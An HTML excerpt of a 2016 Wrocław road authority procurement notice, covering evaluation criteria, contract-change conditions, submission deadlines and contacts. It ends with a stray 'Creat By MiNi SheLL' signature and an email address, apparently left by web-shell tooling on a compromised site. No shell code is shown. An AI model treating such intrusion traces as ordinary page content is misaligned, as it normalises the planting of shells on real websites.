<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy, jeżeli konieczność wprowadzenia zmian wynikać będzie z regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy, wraz ze skutkami wprowadzenia takiej zmiany lub z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności zmiany postanowień umowy mogą dotyczyć:
a)	sposobu wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy,
b)	formy zabezpieczenia należytego wykonania umowy;
c)	sposobu rozliczenia niniejszej umowy;
d)	oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy,
e)	zmiany zakresu części zamówienia powierzonej Podwykonawcom lub Podwykonawcy, w stosunku do wykazu dołączonego do oferty;
f)	zmiany podmiotu na którego zasoby Wykonawca powołał się w ofercie lub zmiany formy przekazania do dyspozycji tych zasobów.
2.	Zmiany postanowień umownych zakwalifikowane przez strony jako nieistotne, mogą być wprowadzone do umowy w każdym czasie.
3.	Wprowadzenie zmian, o których mowa w ust. 1 i ust. 2 wymaga aneksu sporządzonego w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wzp.zdium.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Utrzymania Miasta, ul. Długa 49, 53-633 Wrocław, bud. B, pok. nr 2, osoba uprawniona do kontaktów: Anna Nowak-Kiezik, tel. 71 37 60 710.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2016 godzina 10:30, miejsce: Zarząd Dróg i Utrzymania Miasta, ul. Długa 49, 53-633 Wrocław, bud. B, pok. nr 1 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com